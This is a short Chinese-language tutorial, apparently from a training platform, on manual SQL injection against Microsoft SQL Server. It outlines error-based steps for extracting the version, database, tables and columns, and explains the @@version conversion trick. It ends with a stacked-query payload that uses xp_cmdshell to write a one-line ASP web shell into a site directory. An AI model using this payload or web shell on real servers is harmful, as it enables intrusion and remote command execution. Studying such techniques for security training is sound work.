mssql注入是針對於sql server數據庫的
sql server數據庫和mysql數據庫是有所區別的,語句命令之類的可自行百度。
平台:i春秋
內容:mssql手工注入
測試網站:www.test.com
找注入點
點擊test
用數據類型轉換爆錯法
查看版本
原因:@@version是mssql 的全局變量,如果我們把它寫成這樣 and @@version, 那個后面的mssql就會強行把@@version 強行轉換成數字,但是失敗,所以就會將數據庫信息暴露出來
爆當前數據庫名
爆表名
爆列名
爆字段內容
Mssql基本注入成功
如果數據的權限是dba,且知道網站路徑的話,那么我們就可以用這個語句來寫一句話小馬進去:
id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'--
原理是sql server 支持堆疊查詢,利用xp_cmdshell 可以執行cmd指令,cmd指令中用【echo 內容 > 文件】 可以寫文件到磁盤里面